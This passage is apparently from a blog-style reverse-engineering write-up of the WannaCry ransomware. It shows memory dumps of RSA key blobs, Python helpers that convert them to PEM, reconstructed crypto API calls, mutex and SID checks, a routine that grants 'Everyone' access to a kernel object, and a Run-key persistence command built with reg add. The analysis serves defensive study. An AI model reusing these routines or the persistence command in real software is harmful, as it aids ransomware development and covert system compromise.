0040EE38  7A C0 26 A5 6F D6 E5 64 93 03 13 A3 29 6D 03 24  zÀ&¥oÖåd...£)m.$  
0040EE48  F7 C2 89 E9 46 46 72 AB 54 DC D8 C7 75 0F 2D 13  ÷Â.éFFr«TÜØÇu.-.  
0040EE58  31 E7 6D 88 A1 3E A1 2D BE FF DB 94 D1 BD 6D E3  1çm.¡>¡-¾ÿÛ.Ñ½mã  
0040EE68  C2 55 C7 CA FB 2B 63 31 17 97 42 91 93 21 DD 53  ÂUÇÊû+c1..B..!ÝS  
0040EE78  25 1D 64 C9 95 64 D9 B5 7A 9F A3 CA E2 0F 19 66  %.dÉ.dÙµz.£Êâ..f  
0040EE88  E4 04 B5 4D 6F 5D 33 76 1C E9 20 71 4B 22 E0 55  ä.µMo]3v.é qK"àU  
0040EE98  5E 91 56 54 94 3C 36 3B FD FE A1 62 D0 DF D3 6E  ^.VT.<6;ýþ¡bÐßÓn  
0040EEA8  95 8B E1 96 CE 4F 7C 78 38 2B 5E 5F 1B 8C 93 80  ..á.ÎO|x8+^_....  
0040EEB8  5A 6D 23 6F 6D F7 19 88 F1 8C 3D 52 1B D8 AB B4  Zm#om÷..ñ.=R.Ø«´  
0040EEC8  D4 A0 88 0D AC FB 7A FA C2 35 C4 A7 A9 50 62 4A  Ô ..¬ûzúÂ5Ä§©PbJ  
0040EED8  AC 98 9B 30 E1 59 37 51 0C 6D 28 74 AC 11 D9 70  ¬..0áY7Q.m(t¬.Ùp  
0040EEE8  38 2C 35 D3 B8 D9 F1 B7 4F A1 34 36 8B 29 61 39  8,5Ó¸Ùñ·O¡46.)a9  
0040EEF8  35 00 70 DE 73 E5 D5 1C BB 5E B8 60 B6 70 49 85  5.pÞsåÕ.»^¸`¶pI.  
0040EF08  79 65 46 7A 94 81 D6 CC 12 05 84 43 40 6D FC 77  yeFz..ÖÌ...C@müw  
0040EF18  55 8E 45 F8 3D B9 87 A7 89 D2 59 28 CE 16 9A 53  U.Eø=¹.§.ÒY(Î..S  
0040EF28  DC 9D 82 93 AD B1 3C B9 A6 2D AA 9D 43 EC E2 7D  Ü....±<¹¦-ª.Cìâ}  
0040EF38  CA 32 2F 4F 2D 5F 2E 58 38 77 2E 2B 1B 0A FA FE  Ê2/O-_.X8w.+..úþ  
0040EF48  79 5A 80 E1 8D 23 67 40 FF D3 D3 95 7A 14 BE 93  yZ.á.#g@ÿÓÓ.z.¾.  
0040EF58  1B F8 EF 37 C2 EE C8 BF 59 3C 9C 5D 25 B6 44 FF  .øï7ÂîÈ¿Y<.]%¶Dÿ  
0040EF68  6B 9B E9 B4 FD 59 85 BA F1 3A 01 05 F1 3E 62 0D  k.é´ýY.ºñ:..ñ>b.  
0040EF78  7F 1F E2 81 97 66 63 90 20 BB 96 B4 CF 44 C7 7C  ..â..fc. ».´ÏDÇ|  
0040EF88  7E 7D 25 2E 31 35 8B 2A 18 AB D2 41 C9 32 AA 4B  ~}%.15.*.«ÒAÉ2ªK  
0040EF98  CA EF 28 1D BF 2A 9C 1C 36 02 6B 02 0F A7 ED 10  Êï(.¿*..6.k..§í.  
0040EFA8  C0 A0 DA CF 09 72 59 5B C6 3C F9 15 7F AA 22 00  À ÚÏ.rY[Æ<ù..ª".  
0040EFB8  72 E0 A5 5C 79 06 6E 62 35 33 89 56 AB 5F F1 FD  rà¥\y.nb53.V«_ñý  
0040EFC8  93 62 4E 81 1E 3D FC 05 69 A4 2F 51 1B E2 C8 0E  .bN..=ü.i¤/Q.âÈ.  
0040EFD8  A6 86 A2 BF 9D A4 9C B3 DC 89 B3 E3 B0 F0 D7 60  ¦.¢¿.¤.³Ü.³ã°ð×`  
0040EFE8  D6 6C DE 69 1E C9 B0 02 85 96 D7 35 86 36 16 5B  ÖlÞi.É°...×5.6.[  
0040EFF8  E6 05 E1 F9 0B ED 25 80 E0 0A 04 C5 96 5D 34 6C  æ.áù.í%.à..Å.]4l  
0040F008  4C F0 E0 C7 B7 8A 90 3C 98 A2 7A 92 EA 51 E9 05  LðàÇ·..<.¢z.êQé.  
0040F018  EC 7D 3C C9 CD AA B6 66 B3 DB 48 CF 7D FB 6D DD  ì}<ÉÍª¶f³ÛHÏ}ûmÝ  
0040F028  04 B9 1B 97 9E BE E1 58 66 FD E9 70 AC F9 FF B6  .¹...¾áXfýép¬ùÿ¶  
0040F038  23 17 FD F0 35 0C 41 3A 38 9A 2F 3F 16 2A E8 A9  #.ýð5.A:8./?.*è©  
0040F048  73 30 7C 38 C9 C4 7E C6 68 A4 78 FE 6D 00 28 4E  s0|8ÉÄ~Æh¤xþm.(N  
0040F058  33 87 E5 B6 C9 C5 3D EC 0E 92 03 EB 15 9B 38 73  3.å¶ÉÅ=ì...ë..8s  
0040F068  BF 0F C1 7B 5A 89 51 F1 97 71 F5 D5 CA 44 9F 87  ¿.Á{Z.Qñ.qõÕÊD..  
0040F078  E7 DD 35 6D C0 1F CD 5B 93 C1 00 0E F1 A9 25 C8  çÝ5mÀ.Í[.Á..ñ©%È  
0040F088  F6 E8 8B C7                                      öè.Ç

//PUBLICKEYSTRUC OUTPUT After Using the Python script

07 02 00 00 00 A4 00 00 52 53 41 32 00 08 00 00
01 00 01 00 43 2B 4D 2B 04 9C 0A D9 9F 1E DA 5F
ED 32 A9 EF E1 CE 1A 50 F4 15 E7 51 7B EC B0 27
56 05 58 B4 F6 83 C9 B6 77 5B 80 61 18 1C AB 14
D5 6A FD 3B 70 9D 13 3F 2E 21 13 F1 E7 AF E3 FB
AB 6E 43 71 25 6D 1D 52 D6 05 5F 13 27 9E 28 89
F6 CA 90 93 0A 68 C4 DE 82 9B AA C2 82 02 B1 18
60 01 63 1B BC 71 8D BE 64 88 5E D5 0D 6C C1 9C
C9 01 36 89 C9 80 37 8F 1D 89 67 4F 0C B1 3C 61
09 3A 02 5D B8 4E F5 88 0A 9F 8C 0A 86 DF 91 FE
CD 9F A3 A0 13 D3 2D 30 77 D1 F0 A8 D7 AB 96 E5
48 96 37 03 69 64 97 06 5C 27 50 8C 91 76 67 85
3A 6C 6A B2 59 12 0A 61 F2 A1 EE A8 24 C8 E4 B1
11 6D D6 CC F7 8F 4C 5E B0 55 84 81 6D 60 45 84
0F FC DF F9 27 A5 52 C9 5B 06 28 A3 DE 74 03 D6
C7 72 66 DC BE A4 1E FF 20 96 ED 51 84 00 CC 9C
36 64 F2 85 4D CF 36 60 DD C8 B0 F1 91 DB 7A 0B
83 EE CF EF 19 D7 12 DA AE 86 D9 F9 0E BE 02 AF
78 F3 5B 49 BE 0C 98 AF B5 5F D6 8A 4C 05 48 64
9C 40 E1 1C F9 3C C4 E4 42 08 2D B2 B8 8A E6 0B
6D DF 93 CC 34 E8 48 30 93 5D DF 8D 2E B3 3D 35
E4 66 30 AD 8B E7 20 3D E0 C9 D9 6C 36 4B 79 B9
64 CD BC 5E 24 48 D4 88 90 1C 3D 17 4E 65 0C EC
FB 1B 2B EC 5C C3 06 D6 6C 39 D8 6C 7E 23 9F 40
AF 40 61 B4 FB B1 F6 82 CD A1 26 B8 8D C8 38 8F
94 03 4E FB BB EC 17 5E DD 46 F7 E7 FB DF 25 21
AD 35 BD 9B 1D B5 01 3F 4E B0 20 B7 23 36 79 81
29 3C DE E2 76 D7 E6 1F 9F EA 2D A5 C4 6A AA 40
30 0D CC FE 58 E9 89 28 CB D7 E4 9C 7B B9 50 17
A7 31 21 3B B4 91 F3 84 A6 BD 9E 03 CA E9 CD EE
4D 2B 29 FA 02 0F E7 2C AE 30 BD 85 CC 2D 13 83
12 53 D3 F3 41 4E F5 23 D6 CE 5F 41 CD 81 7C 3B
F0 49 81 B8 EE 8D 35 3C BA EC 92 C7 EE CF 24 63
01 F3 4A F4 D9 DA 8B E2 C0 A4 A5 7F DA 8F 3C 50
19 EC C2 33 5A 8F EE 7B 5A E9 83 7A 96 FD 94 4B
69 50 9A D2 34 D1 09 61 45 96 7D D8 12 5E A8 AE
7A C0 26 A5 6F D6 E5 64 93 03 13 A3 29 6D 03 24
F7 C2 89 E9 46 46 72 AB 54 DC D8 C7 75 0F 2D 13
31 E7 6D 88 A1 3E A1 2D BE FF DB 94 D1 BD 6D E3
C2 55 C7 CA FB 2B 63 31 17 97 42 91 93 21 DD 53
25 1D 64 C9 95 64 D9 B5 7A 9F A3 CA E2 0F 19 66
E4 04 B5 4D 6F 5D 33 76 1C E9 20 71 4B 22 E0 55
5E 91 56 54 94 3C 36 3B FD FE A1 62 D0 DF D3 6E
95 8B E1 96 CE 4F 7C 78 38 2B 5E 5F 1B 8C 93 80
5A 6D 23 6F 6D F7 19 88 F1 8C 3D 52 1B D8 AB B4
D4 A0 88 0D AC FB 7A FA C2 35 C4 A7 A9 50 62 4A
AC 98 9B 30 E1 59 37 51 0C 6D 28 74 AC 11 D9 70
38 2C 35 D3 B8 D9 F1 B7 4F A1 34 36 8B 29 61 39
35 00 70 DE 73 E5 D5 1C BB 5E B8 60 B6 70 49 85
79 65 46 7A 94 81 D6 CC 12 05 84 43 40 6D FC 77
55 8E 45 F8 3D B9 87 A7 89 D2 59 28 CE 16 9A 53
DC 9D 82 93 AD B1 3C B9 A6 2D AA 9D 43 EC E2 7D
CA 32 2F 4F 2D 5F 2E 58 38 77 2E 2B 1B 0A FA FE
79 5A 80 E1 8D 23 67 40 FF D3 D3 95 7A 14 BE 93
1B F8 EF 37 C2 EE C8 BF 59 3C 9C 5D 25 B6 44 FF
6B 9B E9 B4 FD 59 85 BA F1 3A 01 05 F1 3E 62 0D
7F 1F E2 81 97 66 63 90 20 BB 96 B4 CF 44 C7 7C
7E 7D 25 2E 31 35 8B 2A 18 AB D2 41 C9 32 AA 4B
CA EF 28 1D BF 2A 9C 1C 36 02 6B 02 0F A7 ED 10
C0 A0 DA CF 09 72 59 5B C6 3C F9 15 7F AA 22 00
72 E0 A5 5C 79 06 6E 62 35 33 89 56 AB 5F F1 FD
93 62 4E 81 1E 3D FC 05 69 A4 2F 51 1B E2 C8 0E
A6 86 A2 BF 9D A4 9C B3 DC 89 B3 E3 B0 F0 D7 60
D6 6C DE 69 1E C9 B0 02 85 96 D7 35 86 36 16 5B
E6 05 E1 F9 0B ED 25 80 E0 0A 04 C5 96 5D 34 6C
4C F0 E0 C7 B7 8A 90 3C 98 A2 7A 92 EA 51 E9 05
EC 7D 3C C9 CD AA B6 66 B3 DB 48 CF 7D FB 6D DD
04 B9 1B 97 9E BE E1 58 66 FD E9 70 AC F9 FF B6
23 17 FD F0 35 0C 41 3A 38 9A 2F 3F 16 2A E8 A9
73 30 7C 38 C9 C4 7E C6 68 A4 78 FE 6D 00 28 4E
33 87 E5 B6 C9 C5 3D EC 0E 92 03 EB 15 9B 38 73
BF 0F C1 7B 5A 89 51 F1 97 71 F5 D5 CA 44 9F 87
E7 DD 35 6D C0 1F CD 5B 93 C1 00 0E F1 A9 25 C8
F6 E8 8B C7

//Final PUBLICKEYSTRUC OUTPUT After Using the Python script

-----BEGIN RSA PUBLIC KEY-----
BwIAAACkAABSU0EyAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAn
VgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ
9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxh
CToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeF
OmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPW
x3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/vGdcS2q6G2fkOvgKv
ePNbSb4MmK+1X9aKTAVIZJxA4Rz5PMTkQggtsriK5gtt35PMNOhIMJNd340usz01
5GYwrYvnID3gydlsNkt5uWTNvF4kSNSIkBw9F05lDOz7GyvsXMMG1mw52Gx+I59A
r0BhtPux9oLNoSa4jcg4j5QDTvu77Bde3Ub35/vfJSGtNb2bHbUBP06wILcjNnmB
KTze4nbX5h+f6i2lxGqqQDANzP5Y6Ykoy9fknHu5UBenMSE7tJHzhKa9ngPK6c3u
TSsp+gIP5yyuML2FzC0TgxJT0/NBTvUj1s5fQc2BfDvwSYG47o01PLrsksfuzyRj
AfNK9Nnai+LApKV/2o88UBnswjNaj+57WumDepb9lEtpUJrSNNEJYUWWfdgSXqiu
esAmpW/W5WSTAxOjKW0DJPfCielGRnKrVNzYx3UPLRMx522IoT6hLb7/25TRvW3j
wlXHyvsrYzEXl0KRkyHdUyUdZMmVZNm1ep+jyuIPGWbkBLVNb10zdhzpIHFLIuBV
XpFWVJQ8Njv9/qFi0N/TbpWL4ZbOT3x4OCteXxuMk4BabSNvbfcZiPGMPVIb2Ku0
1KCIDaz7evrCNcSnqVBiSqyYmzDhWTdRDG0odKwR2XA4LDXTuNnxt0+hNDaLKWE5
NQBw3nPl1Ry7XrhgtnBJhXllRnqUgdbMEgWEQ0Bt/HdVjkX4PbmHp4nSWSjOFppT
3J2Ck62xPLmmLaqdQ+zifcoyL08tXy5YOHcuKxsK+v55WoDhjSNnQP/T05V6FL6T
G/jvN8LuyL9ZPJxdJbZE/2ub6bT9WYW68ToBBfE+Yg1/H+KBl2ZjkCC7lrTPRMd8
fn0lLjE1iyoYq9JByTKqS8rvKB2/KpwcNgJrAg+n7RDAoNrPCXJZW8Y8+RV/qiIA
cuClXHkGbmI1M4lWq1/x/ZNiToEePfwFaaQvURviyA6mhqK/naScs9yJs+Ow8Ndg
1mzeaR7JsAKFltc1hjYWW+YF4fkL7SWA4AoExZZdNGxM8ODHt4qQPJiiepLqUekF
7H08yc2qtmaz20jPfftt3QS5G5eevuFYZv3pcKz5/7YjF/3wNQxBOjiaLz8WKuip
czB8OMnEfsZopHj+bQAoTjOH5bbJxT3sDpID6xWbOHO/D8F7WolR8Zdx9dXKRJ+H
5901bcAfzVuTwQAO8aklyPboi8c=

-----END RSA PUBLIC KEY-----

You can use this Python code for extracting the Hex Values Only from the memory dump:

def extract_hex_dump(hex_dump):
    hex_values = ''
    for line in hex_dump.split('\n'):
        if line:
            hex_values += ' '.join(line.split()[1:17]) + '\n'
    return hex_values.strip()

# Example usage
memory_dump = '''
[MEMORY DUMP]
'''

hex_dump = extract_hex_dump(memory_dump)
print(hex_dump)

And this Python script is for translating the RSA2 Publick key from hex to PEM (Privacy Enhanced Mail) format.

import binascii

# Input hex key
hex_key = """
[PUBLICKKEY IN HEX]
"""
hex_key = hex_key.replace(" ", "")

# Convert hex to bytes
key_bytes = bytes.fromhex(hex_key)

# Encode bytes to base64 and convert to string
key_data = binascii.b2a_base64(key_bytes).decode("utf-8")

# Build output string
output = "-----BEGIN RSA PUBLIC KEY-----\n"
for i in range(0, len(key_data), 64):
    output += key_data[i:i+64] + "\n"
output += "-----END RSA PUBLIC KEY-----\n"

# Print output
print(output)

Then open a handle from t.wnry file for reading:

CreateFileA("t.wnry", GENERIC_READ, NULL, OPEN_EXISTING, NULL, NULL );

Then reading these data from t.wnry

0249D020  1E 38 22 27 FD E6 7F 0C 5D E7 7E 3E 28 A7 AF FD  .8"'ýæ..]ç~>(§¯ý

Then decrypt it with the RSA2 Public Key:

0249D020  BE E1 9B 98 D2 E5 B1 22 11 CE 21 1E EC B1 3D E6  ¾á..Òå±".Î!.ì±=æ

Analyze the 3rd Stage

creating mutex with the name “MsWinZonesCacheCounterMutexA”

Then getting SID:

SID stands for Security Identifier. It is a unique identifier that is used to represent a security principal such as a user, group, or computer in a Windows operating system. A SID is a string of characters that is typically represented as a series of numbers and letters.

for example SID: S-1–5–21–4158778063–1250727167–3994265684–1001

S: This is the prefix that indicates that this is a SID.
1: This indicates the revision level of the SID structure.
5: This is the identifier authority value, which identifies the entity that issued the SID. In this case, the value of 5 indicates that the SID was issued by the Windows Security Identifier (SID) authority.
21-4158778063-1250727167-3994265684: These are the sub-authorities, which are additional numeric values that are used to further identify the security principal. In this case, the sub-authorities identify the security principal as a user account with a relative identifier (RID) of 1001.
1001: This is the RID value that uniquely identifies the security principal within its domain.

Putting it all together, the SID S-1-5-21-4158778063-1250727167-3994265684-1001 identifies a user account with a relative identifier of 1001 that was issued by the Windows Security Identifier (SID) authority.

Then comparing your SID to S-1-5-18

Malware may search for the SID S-1-5-18 because it is associated with the "Local System" account, which has the highest level of privileges in the Windows operating system. Malware that is able to obtain access to the "Local System" account would have complete control over the system and would be able to perform a wide range of malicious activities, such as installing additional malware, modifying system settings, stealing sensitive information, and more.

Or using another technique:

by calling GetUserName API and then comparing the output to “SYSTEM”:

The GetUserNameA function retrieves the name of the user associated with the current thread or process, depending on the flags that are passed to the function. If the function returns the string "SYSTEM", this indicates that the current thread or process is running in the context of the "Local System" account.

By checking whether the output of GetUserNameA is equal to "SYSTEM", malware can determine whether it is running in the context of the "Local System" account. If it is, the malware can use this access to perform a wide range of malicious activities without being detected by a security software, just like I mentioned in the previous SID.

Then Create another Mutex with the name “Global\\MsWinZonesCacheCounterMutexW0” Or “Global\\MsWinZonesCacheCounterMutexA0”

which depends on CreateMutexA API or CreateMutexW API.

And Then Malware uses this code to modify the security settings of a Windows kernel object to granting permissions to unauthorized users or processes. This could allow the malware to perform actions on the system that would normally be restricted, such as modifying system settings or executing code.

By granting access to the “Everyone” group, the malware can potentially gain access to resources or perform actions that would be otherwise restricted, even if the malware is running under a limited user account. This can make it more difficult for security software to detect or prevent the malware’s actions, and can increase the potential damage that the malware can cause.

GetSecurityInfo(handle, SE_KERNEL_OBJECT, 0x4, 0, 0, &ppDacl, 0, &ppSecurityDescriptor); - This line is using the GetSecurityInfo function to retrieve the security descriptor of a kernel object. The handle parameter is a handle to the object, SE_KERNEL_OBJECT specifies that the object is a kernel object, and 0x4 indicates that the function should retrieve the discretionary access control list (DACL) of the security descriptor. The resulting DACL is stored in the ppDacl parameter, and the entire security descriptor is stored in the ppSecurityDescriptor parameter.
pListOfExplicitEntries.grfAccessPermissions = 2031617; - This line is setting the access permissions for the new ACE (Access Control Entry) that will be added to the DACL. The value 2031617 represents a combination of read, write, and execute permissions.
pListOfExplicitEntries.grfAccessMode = GRANT_ACCESS; - This line specifies that the new ACE should grant access to the specified trustee.
memset(&pListOfExplicitEntries.grfInheritance, 0, 12); - This line is setting the inheritance flags for the new ACE. In this case, the memset function is being used to set the pListOfExplicitEntries.grfInheritance member to all zeroes, which means that the new ACE should not be inherited by child objects.
pListOfExplicitEntries.Trustee.TrusteeForm = TRUSTEE_IS_NAME; - This line is setting the type of the trustee to a name.
pListOfExplicitEntries.Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP; - This line is setting the type of the trustee to a well-known group.
pListOfExplicitEntries.Trustee.ptstrName = aEveryone; - This line is setting the name of the trustee to "Everyone".
SetEntriesInAclA(0x1, &pListOfExplicitEntries, ppDacl, &NewAcl); - This line is using the SetEntriesInAcl function to create a new access control list (ACL) that contains the new ACE. The resulting ACL is stored in the NewAcl parameter.
SetSecurityInfo(handle, SE_KERNEL_OBJECT, 0x4, 0, 0, NewAcl, 0); - This line is using the SetSecurityInfo function to set the new security descriptor for the kernel object. The handle parameter is a handle to the object, SE_KERNEL_OBJECT specifies that the object is a kernel object, 0x4 indicates that the function should modify the DACL of the security descriptor, and NewAcl is the new DACL that was created in the previous step.

Ok, I prefer using Chat-GPT to not consume a lot of time in searching, I need to analyze all code, so, he’s a good helper, I’m googling also to ensure his info is right or not, so, use it for help.

so, this code is adding a new access control entry (ACE) to the discretionary access control list (DACL) of a Windows kernel object. The new ACE grants read, write, and execute permissions to the “Everyone” group, and specifies that the ACE should not be inherited by child objects.

Then Using Encryption APIs:


/*
RSA PUBLICKKEYSTRUC
1000CF40  06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00  .....¤..RSA1....  
1000CF50  01 00 01 00 75 97 4C 3B 84 46 DE 2C 2A F4 95 A8  ....u.L;.FÞ,*ô.¨  
1000CF60  5D C0 CD 6D DA D7 D4 92 1E 13 82 34 6A 70 8D 8F  ]ÀÍmÚ×Ô....4jp..  
1000CF70  7C F7 04 92 55 7F F1 A2 27 B2 9E 41 AC 90 80 91  |÷..U.ñ¢'².A¬...  
1000CF80  18 93 C2 B1 7B AD 2B F3 FF AF DB 2B 51 BE 1D A3  ..Â±{.+óÿ¯Û+Q¾.£  
1000CF90  27 E3 A7 57 08 5A BE C1 1D F6 04 F8 1C BE 5B B1  'ã§W.Z¾Á.ö.ø.¾[±  
1000CFA0  67 FB E4 C8 DA 75 00 70 B1 17 70 24 6C 09 63 74  gûäÈÚu.p±.p$l.ct  
1000CFB0  AC 4B 0A 1D 71 AE 7F AE 65 B8 C5 86 79 C5 7E 9F  ¬K..q®.®e¸Å.yÅ~.  
1000CFC0  98 60 4C 52 B9 29 62 CB 23 29 ED 31 91 74 7B 7B  .`LR¹)bË#)í1.t{{  
1000CFD0  0B 26 1B F2 7D 67 BF DA 7A 40 DA F2 61 4D 94 A5  .&.ò}g¿Úz@ÚòaM.¥  
1000CFE0  7D AD 59 6B AD 9E A3 3A 39 C6 5B 6E 9F D2 BB 36  }.Yk..£:9Æ[n.Ò»6  
1000CFF0  B5 F5 D2 65 F5 2C 30 D8 C1 17 BD AF 28 00 96 20  µõÒeõ,0ØÁ.½¯(..   
1000D000  46 A7 2D 62 03 0C D7 D0 75 A0 0B 07 EA D4 1F CA  F§-b..×Ðu ..êÔ.Ê  
1000D010  E8 D9 4E DB 38 F2 26 75 CB 12 A6 88 70 9B E1 EA  èÙNÛ8ò&uË.¦.p.áê  
1000D020  32 DC F8 71 72 50 41 E6 17 81 68 27 42 8E DF E5  2ÜøqrPAæ..h'B.ßå  
1000D030  DE A1 72 D9 3B FB E5 9D 30 11 69 92 CD 60 2B E2  Þ¡rÙ;ûå.0.i.Í`+â  
1000D040  D5 46 3C 28 CF 9D 30 4A F7 AD B9 FB 0F 91 FE 2E  ÕF<(Ï.0J÷.¹û..þ.  
1000D050  BE 18 F1 CE 06 02 00 00 00                      ¾.ñÎ.

After running our earier code:
06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
01 00 01 00 75 97 4C 3B 84 46 DE 2C 2A F4 95 A8
5D C0 CD 6D DA D7 D4 92 1E 13 82 34 6A 70 8D 8F
7C F7 04 92 55 7F F1 A2 27 B2 9E 41 AC 90 80 91
18 93 C2 B1 7B AD 2B F3 FF AF DB 2B 51 BE 1D A3
27 E3 A7 57 08 5A BE C1 1D F6 04 F8 1C BE 5B B1
67 FB E4 C8 DA 75 00 70 B1 17 70 24 6C 09 63 74
AC 4B 0A 1D 71 AE 7F AE 65 B8 C5 86 79 C5 7E 9F
98 60 4C 52 B9 29 62 CB 23 29 ED 31 91 74 7B 7B
0B 26 1B F2 7D 67 BF DA 7A 40 DA F2 61 4D 94 A5
7D AD 59 6B AD 9E A3 3A 39 C6 5B 6E 9F D2 BB 36
B5 F5 D2 65 F5 2C 30 D8 C1 17 BD AF 28 00 96 20
46 A7 2D 62 03 0C D7 D0 75 A0 0B 07 EA D4 1F CA
E8 D9 4E DB 38 F2 26 75 CB 12 A6 88 70 9B E1 EA
32 DC F8 71 72 50 41 E6 17 81 68 27 42 8E DF E5
DE A1 72 D9 3B FB E5 9D 30 11 69 92 CD 60 2B E2
D5 46 3C 28 CF 9D 30 4A F7 AD B9 FB 0F 91 FE 2E
BE 18 F1 CE 06 02

After runing our earier code
-----BEGIN RSA PUBLIC KEY-----
BgIAAACkAABSU0ExAAgAAAEAAQB1l0w7hEbeLCr0lahdwM1t2tfUkh4TgjRqcI2P
fPcEklV/8aInsp5BrJCAkRiTwrF7rSvz/6/bK1G+HaMn46dXCFq+wR32BPgcvlux
Z/vkyNp1AHCxF3AkbAljdKxLCh1xrn+uZbjFhnnFfp+YYExSuSliyyMp7TGRdHt7
CyYb8n1nv9p6QNryYU2UpX2tWWutnqM6OcZbbp/Suza19dJl9Sww2MEXva8oAJYg
RqctYgMM19B1oAsH6tQfyujZTts48iZ1yxKmiHCb4eoy3PhxclBB5heBaCdCjt/l
3qFy2Tv75Z0wEWmSzWAr4tVGPCjPnTBK9625+w+R/i6+GPHOBgIAAA==

-----END RSA PUBLIC KEY-----

*/
CryptAcquireContextW(&hProv, NULL,
"Microsoft Enhanced RSA and AES Cryptographic Provider", 
PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
CryptImportKey(hProv, PUBLICKKEYSTRUC, 276, NULL, NULL, &HCRYPTKEY); // use this public key above for that Prov
CryptGenKey(hProv, CALG_RSA_KEYX, CRYPT_EXPORTABLE|AT_KEYEXCHANGE, &exKey);
CryptExportKey(exKey, NULL, PUBLICKEYBLOB, 0,&NewPUBLICKEYBLOB,276); // the new public key generated
CreateFileA("00000000.pky", GENERIC_WRITE, NULL, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // created public key file 
WriteFile(h, NewPUBLICKEYBLOB, 276, &len, NULL); //store the new public key generated
CryptExportKey(exKey, NULL, PRIVATEKEYBLOB, 0,&PRIVATEKEYBLOB,276); // generate a random private key
CryptGetKeyParam(exKey, KP_BLOCKLEN, &Plen,0x4,NULL); // take its length
CryptEncrypt(exeKey, NULL, TRUE, NULL, PRIVATEKEYBLOB); // encrypt the private key
CreateFileA("00000000.eky", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // create encrypted private key file
SetFilePointer(h, NULL, NULL, FILE_END); // set the pointer to the end of the file which is the first
WriteFile(h, Plen, 4, &len, NULL); // size of the encrypted key 1280
WriteFile(h, PRIVATEKEYBLOB, Plen, &len, NULL); // the encrypted private key

// Then getting the content of the public key file and pass it to the cryptimportkey

CryptGenRandom(hProv, 8, &random); // receive random crypto 8 bytes
CreateFileA("00000000.res", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // created res file
WriteFile(h, random, 136, &len, NULL); // Put the random data to the res file

Here is the Chat-GPT answer for the 0x6 hex value of the third parameter of CryptExportKey:

But I’m always googling to ensure his info, and here is a link for WinCrypt.h library:

winsdk-7/WinCrypt.h at master · tpn/winsdk-7

Windows 7 SDK. Contribute to tpn/winsdk-7 development by creating an account on GitHub.

github.com

// exported key blob definitions
// certenrolld_begin -- *BLOB
#define SIMPLEBLOB              0x1
#define PUBLICKEYBLOB           0x6
#define PRIVATEKEYBLOB          0x7
#define PLAINTEXTKEYBLOB        0x8
#define OPAQUEKEYBLOB           0x9
#define PUBLICKEYBLOBEX         0xA
#define SYMMETRICWRAPKEYBLOB    0xB
#if (NTDDI_VERSION >= NTDDI_WS03)
#define KEYSTATEBLOB            0xC
#endif //(NTDDI_VERSION >= NTDDI_WS03)

so, 0x6 is PUBLICKEYBLOB, Let’s see Chat-GPT:

He is stupid, so I always say: Use Chat-GPT as a helper, not as a Teacher.

Here is the WannaCry RSA Public Key,

And here is for 00000000.pky file creation:

Then write to it the exported Public Key which got from CryptExportKey API, so it’s random:

And here is the Public Key in the file which was exported randomly:

And here created the 00000000.eky Encrypted Private Key file:

And here putting the size of the encrypted key first to 00000000.eky file:

And then put the encrypted Private Key:

Then import the public key from the file:

And here are the main 5 Threads of the malware:

The 1st Thread is creating 00000000.res file:

Then put the data got from CryptGenKey API into the res file:

And here is the content of the res file:

It’s a loop for waiting 25 seconds and putting the current time into the res file.

We will see later why he using it.

The 2nd Thread is related to 00000000.dky file

again, he executes evry 5 second this function:

If the file 00000000.dky is not existed, come after 5 seconds and see if exists or not:

Then Running the taskdl.exe file as a Process:

And here is the Main function of the taskdl.exe:

it first calls the GetLogicalDrives function to retrieve a bitmask of all currently available logical drives. Then it loops through each drive letter (starting from 'Z' and going backward to 'C') and checks if that drive is available (by checking the corresponding bit in the LogicalDrives bitmask) and if it is not a CD-ROM drive (by calling GetDriveTypeW with the drive letter).

from Z to C not to A.

And here Adding $RECYCLE to the driver:

like if he found D:\\ Driver, the output will be: D:\$RECYCLE

Or just get the Temp file like C:\Users\User\AppData\Local\Temp\

Then Add *.WNCRY to that driver:

D:\$RECYCLE\*.WNCRYT

Which D: is your driver, and $RECYCLE which added and also *.WNCRYT was added, so I think it will take all extensions of files to add.WNCRYT, that’s why he added *, We know he does it, but let’s see how?

Or Add it to the TEMP file:

C:\Users\User\AppData\Local\Temp\*.WNCRYT

And here trying to find all of these files with .WNCRYT extension, we will analyze it later because we don’t have it, or let’s make a file in the temp with .WNCRYT extension.

I created a WNCRYT file, let’s run again the malware:

And here, he found our file:

He makes some manipulation and then delete it:

Let’s Say, It’s a deletion program for all WNCRYT extention.

Then running the Taskse.exe file as a process in the last thread

Here is the main function of the last thread which getting the C2 servers from c.wnry file and then running the taskse.exe as @WanaDecryptor@.exe process, then running a command.

He first Creates a Process with the command line: @WanaDecryptor@.exe, if this file exists. So He needs to create this file first to run this process.

Here, the loop body for this thread, which get the file path of “tasksche.exe” file, and then run the command.

He runs this command:

cmd.exe /c reg add %s /v “%s” /t REG_SZ /d “\”%s\”” /f

which registry key is the Run Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Here is the random name form the machine name:

And here the final result of the command line:

which will be:

cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “xvggyhfuuf622” /t REG_SZ /d “\”C:\Users\User\Desktop\tasksche.exe\”” /f

Registry Run Key, Random name from the Computer Name, and the path of tasksche.exe file.

what can do?

cmd.exe is the command interpreter for the Windows operating system.
/c is a switch that specifies that the command to be executed is contained within quotation marks.
reg is the command used to manage the registry in Windows.
add is the sub-command used to add a new entry to the registry.
